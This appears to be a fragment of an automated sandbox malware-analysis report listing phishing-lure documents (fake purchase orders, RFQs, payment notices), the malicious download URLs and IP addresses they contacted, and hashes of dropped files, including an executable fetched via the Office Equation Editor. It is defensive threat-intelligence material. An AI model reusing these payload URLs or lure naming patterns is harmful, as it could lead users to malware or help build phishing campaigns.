                                                                                                                                                        • carbinz.gq/modex/canux.exe
                                                                                                                                                        Kangean PO.docGet hashmaliciousBrowse
                                                                                                                                                        • carbinz.gq/modex/liquidx.exe
                                                                                                                                                        ENQUIRY - J3902 Hollow Section.docGet hashmaliciousBrowse
                                                                                                                                                        • vespang.ml/benp/unholy/fadaa/AmhNUkkKoGogl9g.exe
                                                                                                                                                        PO_7067.docGet hashmaliciousBrowse
                                                                                                                                                        • vespang.ml/benp/unholy/djj/qTRPobspXvlwT1l.exe
                                                                                                                                                        Ball,Globe,plug valve spec.docGet hashmaliciousBrowse
                                                                                                                                                        • vespang.ml/benp/unholy/jap/k0lzSkgsBCEeffT.exe
                                                                                                                                                        Purchase Order.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • vespang.ml/vanal/tesy.scr
                                                                                                                                                        SwiftMt103.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • carbinz.gq/modex/kellyx.exe
                                                                                                                                                        RFQ B 11JU2021.docGet hashmaliciousBrowse
                                                                                                                                                        • vespang.ml/benp/jam/admin/UKq69QoX4veK4Up.exe
                                                                                                                                                        Ball, Globe, plug, Relief and Check valve Spec..docGet hashmaliciousBrowse
                                                                                                                                                        • vespang.ml/benp/jam/omas/skMdx992wfqPuLs.exe
                                                                                                                                                        RFQ1.docGet hashmaliciousBrowse
                                                                                                                                                        • carbinz.gq/modex/nzex.exe
                                                                                                                                                        EBE2101320.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • carbinz.gq/modex/chungx.exe
                                                                                                                                                        Purchase order.docGet hashmaliciousBrowse
                                                                                                                                                        • carbinz.gq/modex/kamix.exe
                                                                                                                                                        000367828992.docGet hashmaliciousBrowse
                                                                                                                                                        • carbinz.gq/modex/kdotx.exe
                                                                                                                                                        SCAN_20161017_151638921_002.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • carbinz.gq/modex/templex.exe
                                                                                                                                                        SIGNED CONTRACT.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • carbinz.gq/modex/kellyx.exe
                                                                                                                                                        lX5zXPa23V.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • carbinz.gq/modex/sirt.exe
                                                                                                                                                        IQ4lblwCjQ.exeGet hashmaliciousBrowse
                                                                                                                                                        • vunachiimpex.xyz/buta/vuga.exe

                                                                                                                                                        Domains

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        carbinz.gaOrder10 06 2021.docGet hashmaliciousBrowse
                                                                                                                                                        • 185.239.243.112
                                                                                                                                                        PO210530_332641.docGet hashmaliciousBrowse
                                                                                                                                                        • 185.239.243.112

                                                                                                                                                        ASN

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        AS-26496-GO-DADDY-COM-LLCUS619wGDCTZA.exeGet hashmaliciousBrowse
                                                                                                                                                        • 23.229.215.137
                                                                                                                                                        Documents_13134976_1377491379.xlsbGet hashmaliciousBrowse
                                                                                                                                                        • 107.180.50.232
                                                                                                                                                        #U00a0Import Custom Duty invoice & its clearance documents.exeGet hashmaliciousBrowse
                                                                                                                                                        • 184.168.131.241
                                                                                                                                                        Payment receipt MT103.exeGet hashmaliciousBrowse
                                                                                                                                                        • 184.168.131.241
                                                                                                                                                        research-531942606.xlsbGet hashmaliciousBrowse
                                                                                                                                                        • 72.167.211.83
                                                                                                                                                        research-121105165.xlsbGet hashmaliciousBrowse
                                                                                                                                                        • 72.167.211.83
                                                                                                                                                        research-76934760.xlsbGet hashmaliciousBrowse
                                                                                                                                                        • 72.167.211.83
                                                                                                                                                        research-1960540844.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 72.167.211.83
                                                                                                                                                        research-1110827633.xlsbGet hashmaliciousBrowse
                                                                                                                                                        • 72.167.211.83
                                                                                                                                                        DocumentScanCopy2021_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                        • 148.66.138.158
                                                                                                                                                        New Order.exeGet hashmaliciousBrowse
                                                                                                                                                        • 184.168.131.241
                                                                                                                                                        DocumentScanCopy202_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                        • 148.66.138.158
                                                                                                                                                        NEW ORDER ZIP.exeGet hashmaliciousBrowse
                                                                                                                                                        • 184.168.131.241
                                                                                                                                                        oVA5JBAJutcna88.exeGet hashmaliciousBrowse
                                                                                                                                                        • 184.168.131.241
                                                                                                                                                        qXDtb88hht.exeGet hashmaliciousBrowse
                                                                                                                                                        • 184.168.131.241
                                                                                                                                                        a8eC6O6okf.exeGet hashmaliciousBrowse
                                                                                                                                                        • 184.168.131.241
                                                                                                                                                        Telex_Payment.exeGet hashmaliciousBrowse
                                                                                                                                                        • 184.168.131.241
                                                                                                                                                        QyKNw7NioL.exeGet hashmaliciousBrowse
                                                                                                                                                        • 184.168.131.241
                                                                                                                                                        Payment_Advice.exeGet hashmaliciousBrowse
                                                                                                                                                        • 184.168.131.241
                                                                                                                                                        SOA #093732.exeGet hashmaliciousBrowse
                                                                                                                                                        • 184.168.131.241
                                                                                                                                                        CLOUDIE-AS-APCloudieLimitedHKOrder10 06 2021.docGet hashmaliciousBrowse
                                                                                                                                                        • 185.239.243.112
                                                                                                                                                        PO210530_332641.docGet hashmaliciousBrowse
                                                                                                                                                        • 185.239.243.112
                                                                                                                                                        NEW ORDER Ref PO-298721.docGet hashmaliciousBrowse
                                                                                                                                                        • 185.239.243.112
                                                                                                                                                        Payment Advice.docGet hashmaliciousBrowse
                                                                                                                                                        • 185.239.243.112
                                                                                                                                                        Kangean PO.docGet hashmaliciousBrowse
                                                                                                                                                        • 185.239.243.112
                                                                                                                                                        ENQUIRY - J3902 Hollow Section.docGet hashmaliciousBrowse
                                                                                                                                                        • 185.239.243.112
                                                                                                                                                        PO_7067.docGet hashmaliciousBrowse
                                                                                                                                                        • 185.239.243.112
                                                                                                                                                        Ball,Globe,plug valve spec.docGet hashmaliciousBrowse
                                                                                                                                                        • 185.239.243.112
                                                                                                                                                        Purchase Order.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 185.239.243.112
                                                                                                                                                        SwiftMt103.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 185.239.243.112
                                                                                                                                                        RFQ B 11JU2021.docGet hashmaliciousBrowse
                                                                                                                                                        • 185.239.243.112
                                                                                                                                                        Ball, Globe, plug, Relief and Check valve Spec..docGet hashmaliciousBrowse
                                                                                                                                                        • 185.239.243.112
                                                                                                                                                        RFQ1.docGet hashmaliciousBrowse
                                                                                                                                                        • 185.239.243.112
                                                                                                                                                        EBE2101320.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 185.239.243.112
                                                                                                                                                        Purchase order.docGet hashmaliciousBrowse
                                                                                                                                                        • 185.239.243.112
                                                                                                                                                        000367828992.docGet hashmaliciousBrowse
                                                                                                                                                        • 185.239.243.112
                                                                                                                                                        SCAN_20161017_151638921_002.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 185.239.243.112
                                                                                                                                                        SIGNED CONTRACT.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 185.239.243.112
                                                                                                                                                        lX5zXPa23V.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 185.239.243.112
                                                                                                                                                        IQ4lblwCjQ.exeGet hashmaliciousBrowse
                                                                                                                                                        • 185.239.243.112

                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                        No context

                                                                                                                                                        Dropped Files

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\nsu2B38.tmp\System.dll090049000009000.exeGet hashmaliciousBrowse
                                                                                                                                                          dYy3yfSkwY.exeGet hashmaliciousBrowse
                                                                                                                                                            PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsxGet hashmaliciousBrowse
                                                                                                                                                              Purchase Order Price List 061021.xlsxGet hashmaliciousBrowse
                                                                                                                                                                Proforma Invoice and Bank swift-REG.PI-0086547654.exeGet hashmaliciousBrowse
                                                                                                                                                                  UGGJ4NnzFz.exeGet hashmaliciousBrowse
                                                                                                                                                                    Proforma Invoice and Bank swift-REG.PI-0086547654.exeGet hashmaliciousBrowse
                                                                                                                                                                      3arZKnr21W.exeGet hashmaliciousBrowse
                                                                                                                                                                        Shipping receipt.exeGet hashmaliciousBrowse
                                                                                                                                                                          New Order TL273723734533.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                            YZ8OvkljWm.exeGet hashmaliciousBrowse
                                                                                                                                                                              U03c2doc.exeGet hashmaliciousBrowse
                                                                                                                                                                                QUOTE061021.exeGet hashmaliciousBrowse
                                                                                                                                                                                  PAYMENT CONFIRMATION.exeGet hashmaliciousBrowse
                                                                                                                                                                                    PO187439.exeGet hashmaliciousBrowse
                                                                                                                                                                                      090009000000090.exeGet hashmaliciousBrowse
                                                                                                                                                                                        NEWORDERLIST.exeGet hashmaliciousBrowse
                                                                                                                                                                                          00404000004.exeGet hashmaliciousBrowse
                                                                                                                                                                                            40900900090000.exeGet hashmaliciousBrowse
                                                                                                                                                                                              INVO090090202.exeGet hashmaliciousBrowse

                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exe
                                                                                                                                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                Size (bytes):245650
                                                                                                                                                                                                Entropy (8bit):7.92465625934964
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3072:DQIURTXJ+McCmF7tC1eb4lhkULBwRLuJTqDW2CLd+d/Lpz3JAdFu4V65bRvSC5aL:Ds9cCmF5SnwvmLd+d/FcU4Y5bRvbRAaa
                                                                                                                                                                                                MD5:CB4947E5C78ADA624D22C28EE9079871
                                                                                                                                                                                                SHA1:EB2C2D329E9BE0B3A74582A4FD9C257BC795A690
                                                                                                                                                                                                SHA-256:02230FB80DB0FE0055730A0AF8B3A0C66A578B2C315206053B80BAE250C5561D
                                                                                                                                                                                                SHA-512:7582AED1984C65C550532AB4A97D6BC5BC45BFCEEACDF329467B39667DBCAAA6A28175AA29FEF30146E16CBDAE903C5381B3D1EA47888F8D29B9F4119A581B26
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                IE Cache URL:http://carbinz.ga/modex/prosperx.exe
                                                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i..iw..iu..i...i..id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s.......................................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc................v..............@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{08186652-BACB-4000-A55F-0BCBA7498F21}.tmp
                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):4096
                                                                                                                                                                                                Entropy (8bit):3.203168596326184
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:F0GA1XaaamUAmjWyP7S01zQ80xvbxkP2oM+YgQen2SiayuA:F4a+WL7S0pQ9xy2oM+9KSiayZ
                                                                                                                                                                                                MD5:961E15249B83098427A134862446FBDA
                                                                                                                                                                                                SHA1:9ED15A70F1EA0C15F34BAC9B107A14DBE497EAA0
                                                                                                                                                                                                SHA-256:EAE1C321425CE1D5E17A989FC60B78614F8D7EEAB5428879B44B8CB160D3F306
                                                                                                                                                                                                SHA-512:29392924BED4046AE45233BBD06A62FBE4B7F28DF56B7C0A8406160B2A2DA5F807B50B5BF5BBA0CFEB94D4CB7AC8E368A5B0D289792E508B9415DF2630F4C52E
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Preview: '._.-.!.#.&...].~./.[.!.5.^.^.).?...@.8.'.!.?.9.=.=.9.8.5.~._.....#.9.@...5.?.[.=.!.$.:.?.?.'.,.2.-...(.]._.@.%.@.?.8...%.|.;...;.[.'.6.-.,.,.@.&.4.>.$.%.^.=.7.2.6.?.;.(.'.8.^.,.7.%.).).9.1...$.9.#.>.4.(.....5.).6...8.&.:.^.4.1.<.5.9.|.0.].`.!.7.*.!.]...;.....+.?...$.5.#.?.6.1.2.+.>.?...=.,.<.?.~.).(.?.-.7.(.].+...>.!.!.-.@.,.!.'...?.&.[.,.@..._...@.+.]...*.9.?.^.;...~.(.2.8.8.>...(.3.|.#.5.|.6.+.6.7.0.../.@.6.0.).*.%.%.&.:.9.?.%.!...!.?.`.=.%.-.@.0.|.?.<.:.(.!._.3.-.<.0.`.].8.8.8.,.4...(.^...9.5.1...0.+.?.?._./...?.?.%.:.'.+.%.?.'.8.?.?.~.!.?.@.9.?.]...$.=.3.4.].%.?.&.?.5.~.[.?.3.@...&.3.8.<.`.3.-.$./.0.].<.5...[.;.#.).?.&.?.%.].?.0.:.].+.*.2.@.>...1.>.@.8.$.8.,...?.=.3.!.9.^.../.(.-.).7.:.9.5.$.5.>.0.?.8.5.1.'.=.2.%.9.@.^.-.@.?.?.@.?.5.;.?.+.4.~._.?.;.`.?.^.@.?.1...+.<.5.@.#.4.#.&.;.^...?.%.?.?.5.?.(.!.[.?.9.^._.3._.2.7._.?.-.<.?.7...?.*...,...0.;.<.5._.?.%.*...^.&.`.?.(.?.2.8.3.&.>.6.5.4.<.'.>.6.3.(.?.4.?...].[.?.!.?.?.5.?...4.~.'.).4.9.(.?.].<.'.`.=...-.).+.7.6.3...!.1.@.`.....6.*.
                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{55594574-8E09-401E-A760-1A1C7B299BE3}.tmp
                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1024
                                                                                                                                                                                                Entropy (8bit):0.05390218305374581
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                                                                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\02vqprgl0atfidc
                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\prosper3512.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):185856
                                                                                                                                                                                                Entropy (8bit):7.998940517618347
                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                SSDEEP:3072:sGXmBfAYT/4RnQPu5PBTgJApkOdFuKxnZMfSWVgVBratxWRHkFIhFQ:sbVZanguBdgJ2JdF/ZMqNbatxWREr
                                                                                                                                                                                                MD5:378DDC5CCA93C62AF29C52E3A139BB7A
                                                                                                                                                                                                SHA1:04C1B1F9C5AF921764E29E654D2D87E80D47C470
                                                                                                                                                                                                SHA-256:7AFCBE7E43FFCFC7268EFAF45629E6B6ED931145C9E5E820D60C5C9B50B0A1C5
                                                                                                                                                                                                SHA-512:977D9A3F41B3AE1D5ADC32926F522BDAB3A77A5472C0A47E63565D8CF6EAEC98C94A3776EA21538E4AFB122F1046F9BB916375B5B632889FFC8ED3430BB0360A
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Preview: )..\.L...b~zy....R...u,....B.pp..pb...u<.-V...1....>o.V.Pw....k..:...h.n.Y@M....T..?1.._2....$H........E..G......S.j....S...;..t..,...kY..t..a&...w=..("'...G..6[=..V$...YR..&T..JN..T.i...F...%....a.........H......F...&.r.,.....x.K..]C......v..N...V..GC.&D...Z9)..39t.i0.....+j..I..+...)._.$.~1.+7.H@.W..N.E,z..1.....lQ.....'7...)I&.1....'I\.<..!..5......Q*..C...}.=..q#q.Rf.Tf.?h.SD...R.K..Q[1..n.b.V1.#.Y......6..t.6..Y......8.+7.}.~...K_..B.J........|.R..Q...:.J!....q...{..[F...;...i...e...}...+[.S.....IV?9..)F.....Q..IT.j.%zh.u:.......L(..R.).6"..Dd......-.y.lC.bZ.. ......~.......T..'...}.m.UC.[6...Z ....!Z#...a..........u#.....jp..OM.p.-XM.N.r.x.D...c_M..{;.....#.N.&8.a.3B>.Ht......}m5....K.........p..Q...R..{Z$.Y..qE...#..c.sZ..;.b.O.u. ........U+....6^.D....MQ.#.%..<..@.....v.n.......+&.t.r.3..[.af...R=UL.....6.v..c.v.......m.E.a@c.R:...hJ.T....4w.<.od2\....z.,..\..{...V..:~r.....D.8.q..`V.19....]=...a)U`..'9..K....n!qN.E#.E.w...2i....q.N.9.).
                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\nsu2B37.tmp
                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\prosper3512.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):278770
                                                                                                                                                                                                Entropy (8bit):7.448079444634977
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6144:OtbVZanguBdgJ2JdF/ZMqNbatxWREwXeQumQ4T3t:qINkc7RTVXeQued
                                                                                                                                                                                                MD5:C4CB16A32F9F83E70EAE2EDB6FD01FF3
                                                                                                                                                                                                SHA1:9E86174F2952237E5170B532A69BC080FCD59765
                                                                                                                                                                                                SHA-256:C8FE712473694B00B45F2AC8C83E57C0527751C6BA118E2A95F3F5B699B7EE57
                                                                                                                                                                                                SHA-512:8D9FC4DB04C2538B792F720A183A337043F77A846B7A71F3D66405C15F975D98CFF7E63ADDD2CB677454765A7D3C2295E522457DB6A479F7F84753C3F4E119CF
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Preview: ._......,.......................xH.......^......y_..........................................................................................................................................................................................................................................J...............#...j...............................................................................................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\nsu2B38.tmp\System.dll
                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\prosper3512.exe
                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):11776
                                                                                                                                                                                                Entropy (8bit):5.855045165595541
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                                                                                                                                MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                                                                                                                                SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                                                                                                                                SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                                                                                                                                SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                • Filename: 090049000009000.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: dYy3yfSkwY.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsx, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: Purchase Order Price List 061021.xlsx, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: UGGJ4NnzFz.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: 3arZKnr21W.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: Shipping receipt.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: New Order TL273723734533.pdf.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: YZ8OvkljWm.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: U03c2doc.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: QUOTE061021.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: PAYMENT CONFIRMATION.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: PO187439.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: 090009000000090.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: NEWORDERLIST.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: 00404000004.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: 40900900090000.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: INVO090090202.exe, Detection: malicious, Browse
                                                                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\wkxohdeyqvvyr
                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\prosper3512.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):56657
                                                                                                                                                                                                Entropy (8bit):4.975811547605918
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:5usA23WeP0CJgK679CbFutzrcnrz42c9nvpVid:012meP0Ikuwtvcz4pBWd
                                                                                                                                                                                                MD5:33CC7C93858999843488542395770601
                                                                                                                                                                                                SHA1:D57862368225F9240C279B0C1C1FA9BA7EB4E8CC
                                                                                                                                                                                                SHA-256:F0738E409A7008B653A4E5C86D90CC73021988D59CAE648772305C41D6668BB1
                                                                                                                                                                                                SHA-512:23F7DA5A861CAB4D0F06174BD78978F325B1D19DCECA6ED7A520B7957529B7D1A3EC1CC838EC140C426B0C64784B744AF6E3A4BB4C4514FE30A40E89CDEFFCAF
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview: U............@...8.A.....B.....C...i.D...i.E...l.F.....G...=.H.....I.....J...e.K...i.L...l.M.....N...=.O.....P...=.Q.....R.....S...i.T...i.U.....V.....W...m.X...i.Y.....Z...\.[.....\.....]...i.^...i._...i.`.....a...\.b.....c.....d...\.e...I.f.....g.....h.....i...i.j...U.k.....l.....m...\.n...I.o.....p...i.q...i.r.....s...\.t...I.u...).v.....w...\.x...I.y.....z...\.{.....|...!.}.....~...\.............................\...........%.....i.....i.....i...............................................\.............................i.....U.................\.................i.....i...........\...........)...........\.................\...........!...........\.............................\...........a.....i.....i.....i...............................................\.............................i.....U.................\.................i.....i...........\......
                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\AWB00028487364 -000487449287.LNK
                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Wed Aug 26 14:08:17 2020, atime=Thu Jun 10 22:21:34 2021, length=5618, window=hide
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):2208
                                                                                                                                                                                                Entropy (8bit):4.504457080244423
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:8i/XTFGqZNGoynOOQh2i/XTFGqZNGoynOOQ/:8i/XJGqvknOOQh2i/XJGqvknOOQ/
                                                                                                                                                                                                MD5:A59ECB3BCA5A3BC022B2EC74C9164210
                                                                                                                                                                                                SHA1:BEA16F2EA9F23D6D8A2472C2B77CC762C4E893A5
                                                                                                                                                                                                SHA-256:878B3049BA993CEAFFC51E70C36DA541C055729F690BB433E2ED57F0D04DBE62
                                                                                                                                                                                                SHA-512:D0994A05C54EF0F440B3E19D1CD660A9D80D94378BB9D65D9C5D948039D21740E0AD1AD17E82758CF545FAE433EB95D5B78A9EDA38A2B0FBC3DAB30E18DF0A06
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview: L..................F.... ...]....{..]....{...H.ZO^...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.. .AWB000~1.DOC..n.......Q.y.Q.y*...8.....................A.W.B.0.0.0.2.8.4.8.7.3.6.4. .-.0.0.0.4.8.7.4.4.9.2.8.7...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\116938\Users.user\Desktop\AWB00028487364 -000487449287.doc.7.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.A.W.B.0.0.0.2.8.4.8.7.3.6.4. .-.0.0.0.4.8.7.4.4.9.2.8.7...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.........
                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):122
                                                                                                                                                                                                Entropy (8bit):4.2017742776002445
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:M17VV/bFtTLUYC80//bFtTLUYCmX17VV/bFtTLUYCv:MNjFtHUYa/jFtHUYljFtHUYs
                                                                                                                                                                                                MD5:1786A2BB4886680139145E9EA52E593A
                                                                                                                                                                                                SHA1:4740E8C7C6E54905E61FAB57C2C16BB29FC4DA9A
                                                                                                                                                                                                SHA-256:97E6B642156387742F3D7C4063743B06D4931BED1434D2649FCC6438A0FF9AAD
                                                                                                                                                                                                SHA-512:9E5C87185924DD711E0624345EBDCE68A976804019D5DD2C60F6A7B3192FF87A2824A8E8E9B7D24C94BBEB25A62951657AA52A2FE3BE087EC9C3EE86F41AD2F1
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview: [doc]..AWB00028487364 -000487449287.LNK=0..AWB00028487364 -000487449287.LNK=0..[doc]..AWB00028487364 -000487449287.LNK=0..
                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):162
                                                                                                                                                                                                Entropy (8bit):2.431160061181642
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                                                                                                                                                MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                                                                                                                                                SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                                                                                                                                                SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                                                                                                                                                SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                                                                                                                                                Malicious:false
